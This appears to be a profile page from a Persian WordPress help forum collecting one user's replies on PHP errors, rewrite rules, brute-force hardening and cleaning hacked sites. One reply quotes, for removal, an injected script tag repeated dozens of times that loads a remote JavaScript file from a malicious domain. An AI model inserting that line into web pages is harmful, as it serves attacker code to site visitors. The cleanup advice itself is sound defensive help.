.jpg.2dc64e9c0e3b0c7bd88aea93d8ca2794.jpg)
damoon_zero
-
تعداد ارسالها
217 -
تاریخ عضویت
-
آخرین بازدید
-
روز های برد
17
نوشتهها ارسال شده توسط damoon_zero
-
-
در 1 ساعت قبل، karimi گفته است :
مشکل رو پیدا کردم از این کدی بود که به فانکشن اضافه کرده بودم برای نمایش تاریخ بروزرسانی:
function wpb_last_updated_date( $content ) { $u_time = get_the_time('U'); $u_modified_time = get_the_modified_time('U'); if ($u_modified_time >= $u_time + 140400 ) { echo("به روزرسانی: "); $updated_date = the_modified_time('d F Y'); } $custom_content .= $content; return $custom_content;
کسی می دونه مشکلش کجاست؟
Error_Reporting رو فعال کنيد و اجازه بديد PHP خطاهای اتفاق افتاده رو گزارش بده ! از فايل wp-config.php هم خط Debug رو پيدا کنيد و TRUE کنيد
خطاها رو اينجا بزاريد تا بشه برّسی و تحليلش کرد -
در ۱ ساعت قبل، ZAHRAn گفته است :
سلام ببخشیدمن الان موندم که بین رشته نرم افزاروitکدوم راانتخاب کنم
ازطرفی هم میترسم اگهitراانتخاب کردم نتونم ادامه بدم وتوش بمونم
لطفاشماکمکم کنیدکه چه رشته ای برم
من اول راهم والان میخوام براکنکوریکی ازاین دورشته ثبت نام کنم
من دیپلمم راازرشته کامپیوترفنی حرفه ای گرفتم وتقریبابازبانای سی شارپ وhtmlوjavaوphpدرحدخودم آشناشدم
ممنون میشم راهنماییم کنید
سلام
مطلبی که مينويسم شايد از نظر دوستانی که مهندسی نرم افزار خوندن ناراحت کننده باشه و
جبهه بگيرن ! ولی حقيقته! و اين گفته ها از زبان يک استاد خوب تو دانشگاه است زمانی که دانشجو بودمو اين استاد توی دانشگاه های معتبری تو آمريکا و اينگيليس استاد بود ! از شانس خوب ما تو يه دوره که اومده بود ايران
تصميم به تدريس گرفته بود و از شانس خوب ما ، استاد ما شد تو يه بازه از زمان و بعد دوباره جمع کرد و رفت از ايران !
دوست عزيز رشته مهندسی نرم افزار ما تو دنيا نداريم بطور رسمی ! و اين رشته فقط تو ايران ساخته شده !!!! مهندسی کامپيوتر داريم
ولی مهندسی نرم افزار نداريم ! مهندسی نرم افزار يک درسه ! يک چارت درسيه ! ولی رشته نيست
توی دنيا ! اگه برای آينده کاری چيز معتبر ميخوای که خارج از ايران هم بتونی ازش استفاده کنی ( اگه بشه استفاده کرد )
دنبال مهندسی نرم افزار نرو ! مهندسی آی تی يا فناوری اطلاعات قابل قبول تر -
در ۱ ساعت قبل، saeedator گفته است :
سلام
در پیوند یکتا تغییری ایجاد کردمحالا وقتی میخام برگردم به حالت نام نوشته پیغام میده : سطح دسترسی نوشتن را از پروندهی web.config حذف کنید
اگر دوستان میدونین چجوری میشه این مشکل رو حل کرد ممنون میشم رانمایی کنین
مطمئن نيستم موقعی که سرور شما ويندوز باشه اين پيام رو ميده يا نه ...
لطفاً بفرماييد سروری که سايت شما رو هاست کرده ويندوز يا لينوکس ؟
اگه لينوکس باشه بايد کانفيگ htaccess بزاريد ، اگه ويندوز همون فايلی که نوشتيد يعنی web.config
که در اون صورت اگه ويندوز باشه بايد از فايل منيجر هاست بريد به دايرکتوری httpdocs و دايرکتوری روت وبسايت
بعد دنبال فايل web.config بگرديد ...
کد زير رو بهش اضافه کنيد بايد مشکلتون رو حل کنه !<rewrite> <rules> <rule name="Main Rule" stopProcessing="true"> <match url=".*" /> <conditions logicalGrouping="MatchAll"> <add input="{REQUEST_FILENAME}" matchType="IsFile" negate="true" /> <add input="{REQUEST_FILENAME}" matchType="IsDirectory" negate="true" /> </conditions> <action type="Rewrite" url="index.php" /> </rule> </rules> </rewrite>
که بعد اينکه کد رو اضافه کرديد فايل web.config يه همچين شکلی ميشه مثلاً !
<?xml version="1.0" encoding="utf-8"?> <configuration> <system.webServer> <rewrite> <rules> <rule name="Main Rule" stopProcessing="true"> <match url=".*" /> <conditions logicalGrouping="MatchAll"> <add input="{REQUEST_FILENAME}" matchType="IsFile" negate="true" /> <add input="{REQUEST_FILENAME}" matchType="IsDirectory" negate="true" /> </conditions> <action type="Rewrite" url="index.php" /> </rule> </rules> </rewrite> <staticContent> <remove fileExtension=".svg" /> <mimeMap fileExtension=".svg" mimeType="image/svg+xml" /> </staticContent> <defaultDocument> <files> <remove value="index.aspx" /> <add value="index.php" /> </files> </defaultDocument> </system.webServer> </configuration>
-
1
-
-
فايلهايی که پيدا کرده رو بايد پاک کنيد ! دقّت کنيد اشتباه پاک نکنيد
مثلاً فايلهای پيدا شده رو نگاه کنيد اسمشون چيه !مثلاً وردپرس همچين فايل هايی نداره ! اينا و پاک کنيد ....
علت اينکه تم رو عوض کرديد باز اينجوريه به اين دليل است که
1 ) فايل های هسته وردپرس ممکنه آلوده شده باشه که در اينصورت تو اسکن نشون داده شده
2 ) Malware خودش رو تو فايلهای مختلف تم تزريق کردهمثل عکسايی که براتون فرستادم بايد چک کنيد و کد های مضر که اوّل فايلها اضافه شده رو پاک کنيد
-
1
-
-
فايل header.php هم از هاست باز کنيد و انتهای خط پنجم قبل از شروع تگ php تا خط اوّل هرچی هست پاک کنيد و save کنيد !
-
1
-
-
خط اوّل رو از فايل index.php پاک کنيد و فايل رو save کنيد !
کد بقيه فايل ها رو هم نگاه کنيد و اگه اين خط کد رو توش ديديد پاکش کنيد !دقت کنيد انتهای خط اوّل تگ پی اچ پی رو پاک نکنيد و قبل از عبارت تگ PHP هر چی هست تا اوّل خط پاک کنيد
<script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script>
-
1
-
-
در 3 دقیقه قبل، vahid 24 گفته است :
جايی فايل هايی که پيدا کرده رو ليست نکرده ؟ Wordfence رو نصب کرديد ؟ با اين افزونه هم اسکن کريد ؟
-
در 10 دقیقه قبل، mohammad1214 گفته است :
سلام وقت بخیر
میخواهم تو قسمت کاربران تو پیشخوان وردپرس
و افزودن کاربر میخوام فیلد ایمیل حذف بشه باید چیکار کرد؟ یا از حالت الزامی برداشته شود
تشکرافزونه زير رو نصب کنيد ببينيد نيازتون رو برطرف می کنه ؟
https://wordpress.org/plugins/custom-registration-form-builder-with-submission-manager/
-
تا اونجايی که اطلاع دارم برای فعاليتهای پزشکی خوبه که از نرم افزارهايی در اين خصوص استفاده بشه که لايسنس هيپا دارند
HIPAA لايسنسی هست که به نرم افزارها ، اپليکيشن ها و سيستم هايی داده ميشه که استانداردهای مصاف پزشکی رو رعايت کرده باشند . چون هرچی باشه اطلاعات مريض ها قرار که ذخيره بشه !
و مسئوليت داره ... اين به اين معنی نيست که استفاده از وردپرس بد است يا مثلاً وردپرس امن نيست ولی همونطور که ميبينيم هر از چند گاهی باگ هايی از اين سيستم مديريت محتوا کشف و گزارش ميشه حالا شما تصور کن زيرو دی هم باشه مثلاً و جای حساسی که داره مريض هاشو با وردپرس مديريت ميکنه سيستيمش رو اين باگ ها رو بشه روشون اکسپلويت کرد ...-
1
-
-
در هم اکنون، vahid 24 گفته است :
چند ماهه فعالیتی نداشتم
از افزونه yoast استفاده میکنم که از سایت معتبری خریدم
بکاپ رو ریستور کنم درست میشه ؟بله درست ميشه ! ولی اين مهمّه بدونيد چطور اين اتفاق افتاده !
اگه حفره اي وجود داشته باشه دوباره نفوذ ممکنه انجام بشه !
بايد برّسی کنيد برای مسائل امنيتی چک بشه !
اگه براتون ممکنه فايل های زير رو از هاست زيپ کنيد و اينجا ضميمه کنيد تا سورس رو نگاهی بندازمheader.php
index.php
wp-login.php
پلاگين زير رو هم نصب کنيد و باهاش يه اسکن بکنيد
ميشه با همين وضعيت سايت ، پاکسازيش کرد ...https://wordpress.org/plugins/quttera-web-malware-scanner/
در صورتی که به پشتيبانی امنيتی و نگهداری وبسايت . آنالايز و تست نفوذ هم نياز داشتيد من ميتونم کمکتون کنم
پيام خصوصی بديد-
1
-
-
در 3 دقیقه قبل، vahid 24 گفته است :
fulldownload .ir
شما افزونه Wordfence رو نصب کنيد و توسط اين افزونه سايتتون رو اسکن کنيد و نتيجه اسکن رو اينجا بزاريد ...
تا من ببينم دقيقاً اين موش کثيف چيه رو سايت شما !افزونه رو حتماً و حتماً از مخازن وردپرس نصب کنيد
لطفاً بفرمائيد آيا از افزونه يا تم نال شده استفاده کرديد ؟
فعاليت مشکوکی چيزی بر نخورديد اين مدّت ؟-
1
-
-
در 3 دقیقه قبل، vahid 24 گفته است :
fulldownload .ir
سايت شما هک شده و Malware توش گذاشته شده ... دارم برّسی ميکنم ... باشيد تا خبرش رو همينجا آپديت می کنم
-
1
-
-
در 1 دقیقه قبل، vahid 24 گفته است :
با سلام
هاستم ویروسی شده سایتم به آدرس زیر وصل میشه
https://dragonforwardknife.com/?p=hezdsyjyhe5gi3bpgmztini&sub1=Nile&sub2=bd.v1وردپرس و آپدیت کردم افزونه ای ام نریختم بازم همینجوریه
ممنون میشم راهنمایی کنید
لطفاً آدرس سايتتون رو برای برّسی بزاريد
-
1
-
-
در 2 ساعت قبل، سولماز گفته است :
ممنونم
حتی اگه بکاپ برگردونيد باز مشکل و حفره امنيتی وجود داره ! حفره وجود داشته که شما هک شديد
حمله ميتونه از سرور انجام شده باشه
ميتونه از سايت شما انجام شده باشه
اگه بک آپ برگردونيد هم از همون جا که حمله شده بهتون دوباره ميتونه بهتون حمله بشه
شما اوّل بايد اين موضوع رو با هاست در ميان بزاريد که اونا سمت خودشون رو چک کنن !
بعد هم که بک آپ رو برگردونيد بايد حفره رو پيدا کنيد و اقدامات امنيتی رو انجام بديد که دوباره هک نشيد !و بعد از همه اينها بايد برای ايمن کردن سايتتون حتماً اقدام کنيد و اين خيلی مهمه !
-
در 1 ساعت قبل، asadiy4n گفته است :
شما داخل config.php تغییری ایجاد کردید ؟
بنظر مياد هک شده ! صفحه لاگين هم دستکاری شده ... agora-imbiss.com
دوستمون آدرس سايتش رو سانسور هم ميکنه !
عکس لوگو وردپرس هم از يجا ديگه يه چيز ديگه سورس داده شده
کلاً من که فکر ميکنم هک شده !@سولماز نيازه که شما وردپرس رو دوباره نصب کنی
يا اگه بک آپ داری ، بک آپ رو ريستورکنی و با رعايت نکات امنيتی سايت رو دوباره بالا بياری+ برای بد افزار ها و کد های مشکوک فايل ها رو برّسی کنيد
+ محدوديت های لازم رو اعمال کنيد
+ کانفيگ امنيتی انجام بديد-
1
-
-
پست اوّل :چرا لاگین نمیشم؟ هک شدم؟
پست دوّم :
پست سوّم :
اميدوارم پست چهارم خطای ورود به ايميلتون نباشه
ميشه لطفاً بفرماييد
اول اينکه وردپرس رو از کجا دانلود کرديد و نصب کرديد ?
دوم اينکه چه تغييراتی داديد تا الان از اوّل ?
سوم اينکه چی شد که اينطوری شد ... ?-
1
-
-
در 4 ساعت قبل، OfflineBaz گفته است :
واقعا ممنونم کلمه ای ایمپورتنت بعد رنگ قرار داده شه یعنی اولیت با این رنگ هست؟ میشه قالب سورس اصلیشو قرار بدم یه چند تغییر دیگه مد نظرمه با کمک شما انجام بدیم؟
important! به اين معنی است که تمام rule های ديگه که برای اون کلاس در خصوص رنگ نوشته شده اند ناديده گرفته بشن و اين Rule برای رنگ اون عنصر در نظر گردفته بشه !
برای تغييرات در سايت شما متأسفانه وقتی ندارم در حال حاضر ولی اگه مايل هستيد برای پشتيبانی وب سايت ميتونم کمکتون کنم
پشتيبانی شامل
برّسی سايت شما
تغييرات
امنيت
ونگهداری سايتدرصورت تمايل پيام خصوصی بديد ... در خدمتم
-
2
-
-
در هم اکنون، saeedator گفته است :
فرقی نکرد:|
يه آدرس بديد من عملی ببينم چه اتفاقی داره ميافته
-
در 2 دقیقه قبل، saeedator گفته است :
الان دقیقا یادم نیس اون موقعی ک بک آپ گرفته بودم این مشکل بوجود اومده بود یا نه
همین چند روز پیش اینکارو کردمحالا تست میکنم ببینم چی میشه
موفق باشيد
-
در 1 دقیقه قبل، saeedator گفته است :
افزونه های مربوط به کش رو همه رو پاک کردم
پوشه های مربوط به کشی که ایجاد کرده بودنم پاک کردمم
کش رو هم خالی کردم
کلا هر کاری که از دستم بر میومده کردم
نکته اینه که اگه من اکسپورت بگیرم
پاک کنم
دوباره فایل اکسپورت گرفته شده رو ایمپورت کنم
خب چ فرقی میکنه؟
حالا انجام میدم البته ببینیم چی میشه!
نه منظور من اينه که از وضعيت الان يک بک آپ داشته باشيد ...
بعد اون بک آپ اوّليه که قبل تغييرات گرفته بوديد رو ريستور کنيد نه اينکه الان بک آپ بگيريد بد همين بک آپ رو برگردونيد ! -
در 47 دقیقه قبل، saeedator گفته است :
حالا من نمیدونما واقعا بی اطلاعم
ولی با توجه به اینکه قبلا همین خروجی دیتابیس رو بردم رو یه سایت خام و دوباره همین مشکل اونجا هم بوجود اومد( ینی ریدایرکت میشد به صفحه اصلی) بنظرتون با ریستور کردن دیتابیس مشکل حل میشه؟
چی بگم واللّه .
بايد ديد . شما يکبار ريستور کن ديتابيس رو ببين مشکل حل ميشه ؟ شايد بخاطر افزونه کش يا يه افزونه مثل اونه که داره اين اتفاق ميافته
اگه افزونه کش داريد . کش رو يکبار Clear کنيد و دوباره امتحان کنيد . آدرس سايت رو هم بديد که بشه عملاً ديد که چه اتفاقی داره ميافته -
در 3 دقیقه قبل، saeedator گفته است :
رفتم رو دیتا بیس
رو سربرگ اکسپورت
دوتا گزینه بود بالاش ک گذاشتم رو دومی تیکشو
کل جداولو نشون داد که میتونسم انتخاب کنم
سلکت آل کردم
اون پایین go رو زدم و یه فایل sql خروجی داد که ازش چنباری رو سایت تستی که عرض کردم قبل تر استفاده کردم و درست کار میکرد
نيازی نبود Custom رو انتخاب کنيد . ديتابيس رو انتخاب ميکرديد همون quick ميگرفتيد اوکی بود
حالا همينطور که گفتم الان از ديتابيس يک بار ديگه بک آپ بگيريد
بعد جدول های ديتابيس رو Drop کنيد و بعد اون بک اوّليه قبل تغييرات رو Import کنيد !
من ولی هنوز متوجه نشدم چرا از قسمت permalink تغييرات رو مثل قبل نميکنيد و مشکل چيه ؟ -
در در ۱۳۹۹/۳/۵ در 14:48، cloner1390 گفته است :
سلام
از امروز وقتی میخوام به وردپرس لاگین بشم ، چون پلاگین محدود کردن تعداد دفعات ورود استفاده کردیم ، زمان میده مثلا 17 ساعت بعد تلاش کنید.فکر کنم دارن روی سایت حملات brute force میزنند.
کارهایی که روی سایت انجام شده
1-تغییر آدرس لاگین هم با پلاگین هم بدون پلاگین انجام شده ولی باز صفحه لاگین رو پیدا می کنند.
2-رمز عبور قوی هست
3-از افزونه کپچا استفاده کردم
4-تعداد دفعات لاگین رو محدود کردم
آیا تایید کد دو مرحله روی سایت ست بشه تاثیری داره؟با اینکه کارها بالا از اول روی سایت انجام شده ولی متاسفانه مشکلی که از امروز شروع شده همچنان ادامه داره و بعد از تغییر صفحه لاگین ، کمتر از چند دقیقه باز صفحه رو پیدا می کنند و حملات رو انجام میدن که نتونیم لاگین کنیم.سایت بر روی کلودفلر هم ست هست.میخواستم دوستانی که تجربه دارند اگر راه حلی دارند ارئه کنند.
پسورد قوی بزاريد و بزاريد حملات بروتفورسشون رو انجام بدن !
اگه روی صفحه ورود Captcha گذاشتيد که ديگه جای نگرانی نيست !
کد زير رو به فايل htaccess از فايل منيجر هاست اضافه کنيد !
اگه از XMLRPC استفاده نمی کنيد ( برای سايتتون App نداريد ) ... XMLRPC.php رو غير فعال و از دسترس خارج کنيد
با افزونه Disable xmlrpc ميتونيد اين کار رو بکنيد يا از کد زير تو فايل htaccess استفاده کنيد
حملات Bruteforce از طريق XMLRPC هم انجام ميشه حتی اگه Captcha داشته باشيد ...پس اگه از اين سرويس استفاده نمی کنيد جلوی دسترسی بهش رو بگيريد !
اگه استفاده می کنيد هم ميتونيد محدودش کنيد .کد زير در htaccess دسترسی به اين فايل رو برای همه منع ميکنه ! ( دستشون رو بزاريد تو پوست گردو )
<Files "xmlrpc.php"> Order Deny,Allow Deny from all </Files>
-
2
-
-
کاری نکنيد !
اوّل بفرمائيد چطوری قبل تغييرات بک آپ گرفتيد از ديتابيس ؟
مشکل بحرانی در سایت php fatal error
در مشکلات دیگر
ارسال شده در
کانفيگ PHP مشکل داره ! يا با هاست تماس بگيريد يا اگه اجازه تغيير تنظيمات PHP به شما داده شده
Memory allocated رو ببينيد چقدر هست ! وارد قسمت تنظيمات PHP از هاست بشيد و تنظيمات PHP رو چک کنيد
اين يعنی برای اجرا شدن اين اسکريپت 32768 بايت حافظه نيازه که با توجه به کانفيگ PHP هاست شما اندازه مجاز از اون مقدار کمتره !
اگه می تونيد و اجازه تغيير اين تنظيمات رو داريد از هاست قسمت PHP اندازه حافظه php رو افزايش بديد !
مثلاً من رو هاست خودم قسمت PHP رو نشون ميدم که چطوری تغيير بديد ...
که اينجا من حافظه اختصاص داده شده رو گذاشتم روی 256 مگابايت